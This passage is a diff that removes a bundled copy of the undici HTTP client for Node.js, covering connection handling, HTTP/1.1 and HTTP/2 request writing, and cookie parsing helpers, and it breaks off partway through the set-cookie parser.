- } - } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { - // Fail head of pipeline. - const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', client[kUrl], [client], err) - - resume(client) -} - -async function connect (client) { - assert(!client[kConnecting]) - assert(!client[kSocket]) - - let { host, hostname, protocol, port } = client[kUrl] - - // Resolve ipv6 - if (hostname[0] === '[') { - const idx = hostname.indexOf(']') - - assert(idx !== -1) - const ip = hostname.substring(1, idx) - - assert(net.isIP(ip)) - hostname = ip - } - - client[kConnecting] = true - - if (channels.beforeConnect.hasSubscribers) { - channels.beforeConnect.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector] - }) - } - - try { - const socket = await new Promise((resolve, reject) => { - client[kConnector]({ - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, (err, socket) => { - if (err) { - reject(err) - } else { - resolve(socket) - } - }) - }) - - if (client.destroyed) { - util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) - return - } - - client[kConnecting] = false - - assert(socket) - - const isH2 = socket.alpnProtocol === 'h2' - if (isH2) { - if (!h2ExperimentalWarned) { - h2ExperimentalWarned = true - process.emitWarning('H2 support is experimental, expect them to change at any time.', { - code: 'UNDICI-H2' - }) - } - - const session = http2.connect(client[kUrl], { - createConnection: () => socket, - peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams - }) - - client[kHTTPConnVersion] = 'h2' - session[kClient] = client - session[kSocket] = socket - session.on('error', onHttp2SessionError) - session.on('frameError', onHttp2FrameError) - session.on('end', onHttp2SessionEnd) - session.on('goaway', onHTTP2GoAway) - session.on('close', onSocketClose) - session.unref() - - client[kHTTP2Session] = session - socket[kHTTP2Session] = session - } else { - if (!llhttpInstance) { - llhttpInstance = await llhttpPromise - llhttpPromise = null - } - - socket[kNoRef] = false - socket[kWriting] = false - socket[kReset] = false - socket[kBlocking] = false - socket[kParser] = new Parser(client, socket, llhttpInstance) - } - - socket[kCounter] = 0 - socket[kMaxRequests] = client[kMaxRequests] - socket[kClient] = client - socket[kError] = null - - socket - .on('error', onSocketError) - .on('readable', onSocketReadable) - .on('end', onSocketEnd) - .on('close', onSocketClose) - - client[kSocket] = socket - - if (channels.connected.hasSubscribers) { - channels.connected.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - socket - }) - } - client.emit('connect', client[kUrl], [client]) - } catch (err) { - if (client.destroyed) { - return - } - - client[kConnecting] = false - - if (channels.connectError.hasSubscribers) { - channels.connectError.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - error: err - }) - } - - if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { - assert(client[kRunning] === 0) - while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { - const request = client[kQueue][client[kPendingIdx]++] - errorRequest(client, request, err) - } - } else { - onError(client, err) - } - - client.emit('connectionError', client[kUrl], [client], err) - } - - resume(client) -} - -function emitDrain (client) { - client[kNeedDrain] = 0 - client.emit('drain', client[kUrl], [client]) -} - -function resume (client, sync) { - if (client[kResuming] === 2) { - return - } - - client[kResuming] = 2 - - _resume(client, sync) - client[kResuming] = 0 - - if (client[kRunningIdx] > 256) { - client[kQueue].splice(0, client[kRunningIdx]) - client[kPendingIdx] -= client[kRunningIdx] - client[kRunningIdx] = 0 - } -} - -function _resume (client, sync) { - while (true) { - if (client.destroyed) { - assert(client[kPending] === 0) - return - } - - if (client[kClosedResolve] && !client[kSize]) { - client[kClosedResolve]() - client[kClosedResolve] = null - return - } - - const socket = client[kSocket] - - if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { - if (client[kSize] === 0) { - if (!socket[kNoRef] && socket.unref) { - socket.unref() - socket[kNoRef] = true - } - } else if (socket[kNoRef] && socket.ref) { - socket.ref() - socket[kNoRef] = false - } - - if (client[kSize] === 0) { - if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { - socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) - } - } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { - if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { - const request = client[kQueue][client[kRunningIdx]] - const headersTimeout = request.headersTimeout != null - ? request.headersTimeout - : client[kHeadersTimeout] - socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) - } - } - } - - if (client[kBusy]) { - client[kNeedDrain] = 2 - } else if (client[kNeedDrain] === 2) { - if (sync) { - client[kNeedDrain] = 1 - process.nextTick(emitDrain, client) - } else { - emitDrain(client) - } - continue - } - - if (client[kPending] === 0) { - return - } - - if (client[kRunning] >= (client[kPipelining] || 1)) { - return - } - - const request = client[kQueue][client[kPendingIdx]] - - if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { - if (client[kRunning] > 0) { - return - } - - client[kServerName] = request.servername - - if (socket && socket.servername !== request.servername) { - util.destroy(socket, new InformationalError('servername changed')) - return - } - } - - if (client[kConnecting]) { - return - } - - if (!socket && !client[kHTTP2Session]) { - connect(client) - return - } - - if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { - return - } - - if (client[kRunning] > 0 && !request.idempotent) { - // Non-idempotent request cannot be retried. - // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { - // Don't dispatch an upgrade until all preceding requests have completed. - // A misbehaving server might upgrade the connection before all pipelined - // request has completed. - return - } - - if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && - (util.isStream(request.body) || util.isAsyncIterable(request.body))) { - // Request with stream or iterator body can error while other requests - // are inflight and indirectly error those as well. - // Ensure this doesn't happen by waiting for inflight - // to complete before dispatching. - - // Request with stream or iterator body cannot be retried. - // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (!request.aborted && write(client, request)) { - client[kPendingIdx]++ - } else { - client[kQueue].splice(client[kPendingIdx], 1) - } - } -} - -// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 -function shouldSendContentLength (method) { - return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' -} - -function write (client, request) { - if (client[kHTTPConnVersion] === 'h2') { - writeH2(client, client[kHTTP2Session], request) - return - } - - const { body, method, path, host, upgrade, headers, blocking, reset } = request - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - const bodyLength = util.bodyLength(body) - - let contentLength = bodyLength - - if (contentLength === null) { - contentLength = request.contentLength - } - - if (contentLength === 0 && !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. - - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. - if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - const socket = client[kSocket] - - try { - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - - util.destroy(socket, new InformationalError('aborted')) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - if (method === 'HEAD') { - // https://github.com/mcollina/undici/issues/258 - // Close after a HEAD request to interop with misbehaving servers - // that may send a body in the response. - - socket[kReset] = true - } - - if (upgrade || method === 'CONNECT') { - // On CONNECT or upgrade, block pipeline from dispatching further - // requests on this connection. - - socket[kReset] = true - } - - if (reset != null) { - socket[kReset] = reset - } - - if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { - socket[kReset] = true - } - - if (blocking) { - socket[kBlocking] = true - } - - let header = `${method} ${path} HTTP/1.1\r\n` - - if (typeof host === 'string') { - header += `host: ${host}\r\n` - } else { - header += client[kHostHeader] - } - - if (upgrade) { - header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` - } else if (client[kPipelining] && !socket[kReset]) { - header += 'connection: keep-alive\r\n' - } else { - header += 'connection: close\r\n' - } - - if (headers) { - header += headers - } - - if (channels.sendHeaders.hasSubscribers) { - channels.sendHeaders.publish({ request, headers: header, socket }) - } - - /* istanbul ignore else: assertion */ - if (!body || bodyLength === 0) { - if (contentLength === 0) { - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - assert(contentLength === null, 'no body must not have content length') - socket.write(`${header}\r\n`, 'latin1') - } - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - socket.write(body) - socket.uncork() - request.onBodySent(body) - request.onRequestSent() - if (!expectsPayload) { - socket[kReset] = true - } - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) - } else { - writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) - } - } else if (util.isStream(body)) { - writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) - } else if (util.isIterable(body)) { - writeIterable({ body, client, request, socket, contentLength, header, expectsPayload }) - } else { - assert(false) - } - - return true -} - -function writeH2 (client, session, request) { - const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request - - let headers - if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) - else headers = reqHeaders - - if (upgrade) { - errorRequest(client, request, new Error('Upgrade not supported for H2')) - return false - } - - try { - // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - /** @type {import('node:http2').ClientHttp2Stream} */ - let stream - const h2State = client[kHTTP2SessionState] - - headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] - headers[HTTP2_HEADER_METHOD] = method - - if (method === 'CONNECT') { - session.ref() - // we are already connected, streams are pending, first request - // will create a new stream. We trigger a request to create the stream and wait until - // `ready` event is triggered - // We disabled endStream to allow the user to write to the stream - stream = session.request(headers, { endStream: false, signal }) - - if (stream.id && !stream.pending) { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - } else { - stream.once('ready', () => { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - }) - } - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) session.unref() - }) - - return true - } - - // https://tools.ietf.org/html/rfc7540#section-8.3 - // :path and :scheme headers must be omited when sending CONNECT - - headers[HTTP2_HEADER_PATH] = path - headers[HTTP2_HEADER_SCHEME] = 'https' - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - let contentLength = util.bodyLength(body) - - if (contentLength == null) { - contentLength = request.contentLength - } - - if (contentLength === 0 || !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. - - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. - if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - if (contentLength != null) { - assert(body, 'no body must not have content length') - headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` - } - - session.ref() - - const shouldEndStream = method === 'GET' || method === 'HEAD' - if (expectContinue) { - headers[HTTP2_HEADER_EXPECT] = '100-continue' - stream = session.request(headers, { endStream: shouldEndStream, signal }) - - stream.once('continue', writeBodyH2) - } else { - stream = session.request(headers, { - endStream: shouldEndStream, - signal - }) - writeBodyH2() - } - - // Increment counter as we have new several streams open - ++h2State.openStreams - - stream.once('response', headers => { - const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers - - if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { - stream.pause() - } - }) - - stream.once('end', () => { - request.onComplete([]) - }) - - stream.on('data', (chunk) => { - if (request.onData(chunk) === false) { - stream.pause() - } - }) - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) { - session.unref() - } - }) - - stream.once('error', function (err) { - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - stream.once('frameError', (type, code) => { - const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) - errorRequest(client, request, err) - - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - // stream.on('aborted', () => { - // // TODO(HTTP/2): Support aborted - // }) - - // stream.on('timeout', () => { - // // TODO(HTTP/2): Support timeout - // }) - - // stream.on('push', headers => { - // // TODO(HTTP/2): Suppor push - // }) - - // stream.on('trailers', headers => { - // // TODO(HTTP/2): Support trailers - // }) - - return true - - function writeBodyH2 () { - /* istanbul ignore else: assertion */ - if (!body) { - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - stream.cork() - stream.write(body) - stream.uncork() - stream.end() - request.onBodySent(body) - request.onRequestSent() - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ - client, - request, - contentLength, - h2stream: stream, - expectsPayload, - body: body.stream(), - socket: client[kSocket], - header: '' - }) - } else { - writeBlob({ - body, - client, - request, - contentLength, - expectsPayload, - h2stream: stream, - header: '', - socket: client[kSocket] - }) - } - } else if (util.isStream(body)) { - writeStream({ - body, - client, - request, - contentLength, - expectsPayload, - socket: client[kSocket], - h2stream: stream, - header: '' - }) - } else if (util.isIterable(body)) { - writeIterable({ - body, - client, - request, - contentLength, - expectsPayload, - header: '', - h2stream: stream, - socket: client[kSocket] - }) - } else { - assert(false) - } - } -} - -function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') - - if (client[kHTTPConnVersion] === 'h2') { - // For HTTP/2, is enough to pipe the stream - const pipe = pipeline( - body, - h2stream, - (err) => { - if (err) { - util.destroy(body, err) - util.destroy(h2stream, err) - } else { - request.onRequestSent() - } - } - ) - - pipe.on('data', onPipeData) - pipe.once('end', () => { - pipe.removeListener('data', onPipeData) - util.destroy(pipe) - }) - - function onPipeData (chunk) { - request.onBodySent(chunk) - } - - return - } - - let finished = false - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - - const onData = function (chunk) { - if (finished) { - return - } - - try { - if (!writer.write(chunk) && this.pause) { - this.pause() - } - } catch (err) { - util.destroy(this, err) - } - } - const onDrain = function () { - if (finished) { - return - } - - if (body.resume) { - body.resume() - } - } - const onAbort = function () { - if (finished) { - return - } - const err = new RequestAbortedError() - queueMicrotask(() => onFinished(err)) - } - const onFinished = function (err) { - if (finished) { - return - } - - finished = true - - assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) - - socket - .off('drain', onDrain) - .off('error', onFinished) - - body - .removeListener('data', onData) - .removeListener('end', onFinished) - .removeListener('error', onFinished) - .removeListener('close', onAbort) - - if (!err) { - try { - writer.end() - } catch (er) { - err = er - } - } - - writer.destroy(err) - - if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { - util.destroy(body, err) - } else { - util.destroy(body) - } - } - - body - .on('data', onData) - .on('end', onFinished) - .on('error', onFinished) - .on('close', onAbort) - - if (body.resume) { - body.resume() - } - - socket - .on('drain', onDrain) - .on('error', onFinished) -} - -async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength === body.size, 'blob body must have content length') - - const isH2 = client[kHTTPConnVersion] === 'h2' - try { - if (contentLength != null && contentLength !== body.size) { - throw new RequestContentLengthMismatchError() - } - - const buffer = Buffer.from(await body.arrayBuffer()) - - if (isH2) { - h2stream.cork() - h2stream.write(buffer) - h2stream.uncork() - } else { - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - socket.write(buffer) - socket.uncork() - } - - request.onBodySent(buffer) - request.onRequestSent() - - if (!expectsPayload) { - socket[kReset] = true - } - - resume(client) - } catch (err) { - util.destroy(isH2 ? h2stream : socket, err) - } -} - -async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') - - let callback = null - function onDrain () { - if (callback) { - const cb = callback - callback = null - cb() - } - } - - const waitForDrain = () => new Promise((resolve, reject) => { - assert(callback === null) - - if (socket[kError]) { - reject(socket[kError]) - } else { - callback = resolve - } - }) - - if (client[kHTTPConnVersion] === 'h2') { - h2stream - .on('close', onDrain) - .on('drain', onDrain) - - try { - // It's up to the user to somehow abort the async iterable. - for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - const res = h2stream.write(chunk) - request.onBodySent(chunk) - if (!res) { - await waitForDrain() - } - } - } catch (err) { - h2stream.destroy(err) - } finally { - request.onRequestSent() - h2stream.end() - h2stream - .off('close', onDrain) - .off('drain', onDrain) - } - - return - } - - socket - .on('close', onDrain) - .on('drain', onDrain) - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - try { - // It's up to the user to somehow abort the async iterable. - for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - if (!writer.write(chunk)) { - await waitForDrain() - } - } - - writer.end() - } catch (err) { - writer.destroy(err) - } finally { - socket - .off('close', onDrain) - .off('drain', onDrain) - } -} - -class AsyncWriter { - constructor ({ socket, request, contentLength, client, expectsPayload, header }) { - this.socket = socket - this.request = request - this.contentLength = contentLength - this.client = client - this.bytesWritten = 0 - this.expectsPayload = expectsPayload - this.header = header - - socket[kWriting] = true - } - - write (chunk) { - const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return false - } - - const len = Buffer.byteLength(chunk) - if (!len) { - return true - } - - // We should defer writing chunks. - if (contentLength !== null && bytesWritten + len > contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - socket.cork() - - if (bytesWritten === 0) { - if (!expectsPayload) { - socket[kReset] = true - } - - if (contentLength === null) { - socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') - } else { - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - } - } - - if (contentLength === null) { - socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') - } - - this.bytesWritten += len - - const ret = socket.write(chunk) - - socket.uncork() - - request.onBodySent(chunk) - - if (!ret) { - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - } - - return ret - } - - end () { - const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this - request.onRequestSent() - - socket[kWriting] = false - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return - } - - if (bytesWritten === 0) { - if (expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD send a Content-Length in a request message when - // no Transfer-Encoding is sent and the request method defines a meaning - // for an enclosed payload body. - - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - socket.write(`${header}\r\n`, 'latin1') - } - } else if (contentLength === null) { - socket.write('\r\n0\r\n\r\n', 'latin1') - } - - if (contentLength !== null && bytesWritten !== contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } else { - process.emitWarning(new RequestContentLengthMismatchError()) - } - } - - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - - resume(client) - } - - destroy (err) { - const { socket, client } = this - - socket[kWriting] = false - - if (err) { - assert(client[kRunning] <= 1, 'pipeline should only contain this request') - util.destroy(socket, err) - } - } -} - -function errorRequest (client, request, err) { - try { - request.onError(err) - assert(request.aborted) - } catch (err) { - client.emit('error', err) - } -} - -module.exports = Client - - -/***/ }), - -/***/ 6436: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/* istanbul ignore file: only for Node 12 */ - -const { kConnected, kSize } = __nccwpck_require__(2785) - -class CompatWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value[kConnected] === 0 && this.value[kSize] === 0 - ? undefined - : this.value - } -} - -class CompatFinalizer { - constructor (finalizer) { - this.finalizer = finalizer - } - - register (dispatcher, key) { - if (dispatcher.on) { - dispatcher.on('disconnect', () => { - if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { - this.finalizer(key) - } - }) - } - } -} - -module.exports = function () { - // FIXME: remove workaround when the Node bug is fixed - // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 - if (process.env.NODE_V8_COVERAGE) { - return { - WeakRef: CompatWeakRef, - FinalizationRegistry: CompatFinalizer - } - } - return { - WeakRef: global.WeakRef || CompatWeakRef, - FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer - } -} - - -/***/ }), - -/***/ 663: -/***/ ((module) => { - -"use strict"; - - -// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size -const maxAttributeValueSize = 1024 - -// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size -const maxNameValuePairSize = 4096 - -module.exports = { - maxAttributeValueSize, - maxNameValuePairSize -} - - -/***/ }), - -/***/ 1724: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { parseSetCookie } = __nccwpck_require__(4408) -const { stringify, getHeadersList } = __nccwpck_require__(3121) -const { webidl } = __nccwpck_require__(1744) -const { Headers } = __nccwpck_require__(554) - -/** - * @typedef {Object} Cookie - * @property {string} name - * @property {string} value - * @property {Date|number|undefined} expires - * @property {number|undefined} maxAge - * @property {string|undefined} domain - * @property {string|undefined} path - * @property {boolean|undefined} secure - * @property {boolean|undefined} httpOnly - * @property {'Strict'|'Lax'|'None'} sameSite - * @property {string[]} unparsed - */ - -/** - * @param {Headers} headers - * @returns {Record} - */ -function getCookies (headers) { - webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookie = headers.get('cookie') - const out = {} - - if (!cookie) { - return out - } - - for (const piece of cookie.split(';')) { - const [name, ...value] = piece.split('=') - - out[name.trim()] = value.join('=') - } - - return out -} - -/** - * @param {Headers} headers - * @param {string} name - * @param {{ path?: string, domain?: string }|undefined} attributes - * @returns {void} - */ -function deleteCookie (headers, name, attributes) { - webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - name = webidl.converters.DOMString(name) - attributes = webidl.converters.DeleteCookieAttributes(attributes) - - // Matches behavior of - // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 - setCookie(headers, { - name, - value: '', - expires: new Date(0), - ...attributes - }) -} - -/** - * @param {Headers} headers - * @returns {Cookie[]} - */ -function getSetCookies (headers) { - webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookies = getHeadersList(headers).cookies - - if (!cookies) { - return [] - } - - // In older versions of undici, cookies is a list of name:value. - return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? pair[1] : pair)) -} - -/** - * @param {Headers} headers - * @param {Cookie} cookie - * @returns {void} - */ -function setCookie (headers, cookie) { - webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - cookie = webidl.converters.Cookie(cookie) - - const str = stringify(cookie) - - if (str) { - headers.append('Set-Cookie', stringify(cookie)) - } -} - -webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - } -]) - -webidl.converters.Cookie = webidl.dictionaryConverter([ - { - converter: webidl.converters.DOMString, - key: 'name' - }, - { - converter: webidl.converters.DOMString, - key: 'value' - }, - { - converter: webidl.nullableConverter((value) => { - if (typeof value === 'number') { - return webidl.converters['unsigned long long'](value) - } - - return new Date(value) - }), - key: 'expires', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters['long long']), - key: 'maxAge', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'secure', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'httpOnly', - defaultValue: null - }, - { - converter: webidl.converters.USVString, - key: 'sameSite', - allowedValues: ['Strict', 'Lax', 'None'] - }, - { - converter: webidl.sequenceConverter(webidl.converters.DOMString), - key: 'unparsed', - defaultValue: [] - } -]) - -module.exports = { - getCookies, - deleteCookie, - getSetCookies, - setCookie -} - - -/***/ }), - -/***/ 4408: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) -const { isCTLExcludingHtab } = __nccwpck_require__(3121) -const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) -const assert = __nccwpck_require__(9491) - -/** - * @description Parses the field-value attributes of a set-cookie header string. - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} header - * @returns if the header is invalid, null will be returned - */ -function parseSetCookie (header) { - // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F - // character (CTL characters excluding HTAB): Abort these steps and - // ignore the set-cookie-string entirely. - if (isCTLExcludingHtab(header)) { - return null - } - - let nameValuePair = '' - let unparsedAttributes = '' - let name = '' - let value = '' - - // 2. If the set-cookie-string contains a %x3B (";") character: - if (header.includes(';')) { - // 1. The name-value-pair string consists of the characters up to, - // but not including, the first %x3B (";"), and the unparsed- - // attributes consist of the remainder of the set-cookie-string - // (including the %x3B (";") in question). - const position = { position: 0 } - - nameValuePair = collectASequenceOfCodePointsFast(';', header, position) - unparsedAttributes = header.slice(position.position) - } else { - // Otherwise: - - // 1. The name-value-pair string consists of all the characters - // contained in the set-cookie-string, and the unparsed- - // attributes is the empty string. - nameValuePair = header - } - - // 3. If the name-value-pair string lacks a %x3D ("=") character, then - // the name string is empty, and the value string is the value of - // name-value-pair. - if (!nameValuePair.includes('=')) { - value = nameValuePair - } else { - // Otherwise, the name string consists of the characters up to, but - // not including, the first %x3D ("=") character, and the (possibly - // empty) value string consists of the characters after the first - // %x3D ("=") character. - const position = { position: 0 } - name = collectASequenceOfCodePointsFast( - '=', - nameValuePair, - position - ) - value = nameValuePair.slice(position.position + 1) - } - - // 4. Remove any leading or trailing WSP characters from the name - // string and the value string. - name = name.trim() - value = value.trim() - - // 5. If the sum of the lengths of the name string and the value string - // is more than 4096 octets, abort these steps and ignore the set- - // cookie-string entirely. - if (name.length + value.length > maxNameValuePairSize) { - return null - } - - // 6. The cookie-name is the name string, and the cookie-value is the - // value string. - return { - name, value, ...parseUnparsedAttributes(unparsedAttributes) - } -} - -/** - * Parses the remaining attributes of a set-cookie header - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} unparsedAttributes - * @param {[Object.]={}} cookieAttributeList - */ -function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { - // 1. If the unparsed-attributes string is empty, skip the rest of - // these steps. - if (unparsedAttributes.length === 0) { - return cookieAttributeList - } - - // 2. Discard the first character of the unparsed-attributes (which - // will be a 